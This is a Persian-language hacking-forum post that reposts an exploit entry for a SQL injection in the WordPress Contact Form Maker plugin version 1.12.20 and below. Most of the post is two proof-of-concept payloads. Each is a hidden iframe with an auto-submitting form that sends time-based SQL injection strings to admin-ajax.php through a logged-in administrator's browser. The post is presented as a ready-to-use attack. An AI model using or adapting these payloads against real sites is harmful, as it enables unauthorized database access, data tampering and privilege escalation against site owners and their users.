SpareNet Servers Advertising & Link Exchange

اطلاعیه

بستن
هیچ اطلاعیه ای هنوز ایجاد نشده است .

WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection Vulnerability

بستن
X
 
  • فیلتر
  • زمان
  • نمایش
پاک کردن همه
نوشته‌های جدید

  • WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection Vulnerability

    [align=center]WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection Vulnerability
    [/align][align=left]
    کد:
    # Title: WordPress Contact Form Maker Plugin 1.12.20 - SQL Injection
    # Author: Neven Biruski
    # Software: WordPress Contact Form Maker plugin
    # Software link: https://wordpress.org/plugins/contact-form-maker/
    # Version: 1.12.20 and below
    
    # The easiest way to reproduce the SQL injection vulnerabilities is to
    # open the presented HTML/JavaScript snippet in your browser while being
    # logged in as administrator or another user that is authorized to
    # access the plugin settings page. Users that do not have full
    # administrative privileges could abuse the database access the
    # vulnerabilities provide to either escalate their privileges or obtain
    # and modify database contents they were not supposed to be able to.
    
    
    # PoC 1
    
    <iframe style="display:none" name="invisible"></iframe>
    <form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?action=FormMakerSQLMapping_fmc&task=db_table_struct"
    target="invisible">
    <input type="hidden" name="name" value="wp_users WHERE 42=42 AND SLEEP(42)--;"/>
    </form>
    <script>
    document.getElementById("form").submit();
    sleep(3000);
    </script>
    
    # PoC 2
    
    <iframe style="display:none" name="invisible"></iframe>
    <form id="form" method="POST" action="http://vulnerablesite.com/wp-admin/admin-ajax.php?form_id=1&send_header=0&action=generete_csv_fmc&limitstart=0"
    target="invisible">
    <input type="hidden" name="search_labels" value="(SELECT * FROM (SELECT(SLEEP(42)))XXX)"/>
    </form>
    <script>
    document.getElementById("form").submit();
    sleep(3000);
    </script>
    
    # 0day.today [2018-06-10] #
    [/align]
    -----------------------------SAFE MASTER---------------------------
    تاپیک هکر های تازه وارد
صبر کنید ..
X